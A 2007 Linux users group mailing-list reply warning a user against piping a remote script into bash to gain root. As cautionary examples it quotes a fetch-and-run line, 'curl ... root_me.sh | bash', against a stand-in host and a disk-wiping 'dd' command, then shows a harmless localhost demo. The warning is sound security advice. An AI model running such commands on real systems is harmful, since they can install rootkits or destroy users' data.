On Dec 10, 2007 10:58 PM, <[EMAIL PROTECTED]> wrote: > Thanks for responding guys,I'm going to respond to both here. Maybe I need to > explain myself? I'm not trying to pass root password to a script (ie. > expect), I simply want the script to *ask* for root so I didn't have to tell > the end user to type 'su'. I have a chk_root function (which I posted) that > does this locally, but I guess the pipe bash option is ruining things for me. > This could add extra work for as many as hundreds of users, so I was trying > to simply boil things down to one command. Perhaps it's not possible?
The fact that you tried to do something like: # curl http://some.hackable.site.com/root_me.sh | bash Proves to me beyond a reasonable doubt that you can't be trusted with your own box. :-) What if root_me.sh had the command dd if=/dev/zero of=/dev/hda? Or something far worse, like a fetch and execution of a root kit? Anyhow, here is a nice snippet: [EMAIL PROTECTED] ~ $ cat public_html/testing.sh #!/bin/bash echo "YOU FOOL!" [EMAIL PROTECTED] ~ $ curl -s http://localhost/~jesse/testing.sh | bash YOU FOOL! [EMAIL PROTECTED] ~ $ curl --version curl 7.17.1 (x86_64-pc-linux-gnu) libcurl/7.17.1 GnuTLS/2.0.4 zlib/1.2.3 Protocols: tftp ftp telnet dict http file https ftps Features: IPv6 Largefile SSL libz [EMAIL PROTECTED] ~ $ bash --version GNU bash, version 3.2.17(1)-release (x86_64-pc-linux-gnu) Copyright (C) 2005 Free Software Foundation, Inc. _______________________________________________ Mid-Hudson Valley Linux Users Group http://mhvlug.org http://mhvlug.org/cgi-bin/mailman/listinfo/mhvlug Upcoming Meetings (6pm - 8pm) MHVLS Auditorium Dec 5 - Open Source Show and Tell Jan 2 - TBD Feb 6 - DBUS Mar 5 - Setting up a platform-independent home/small office network using Linux
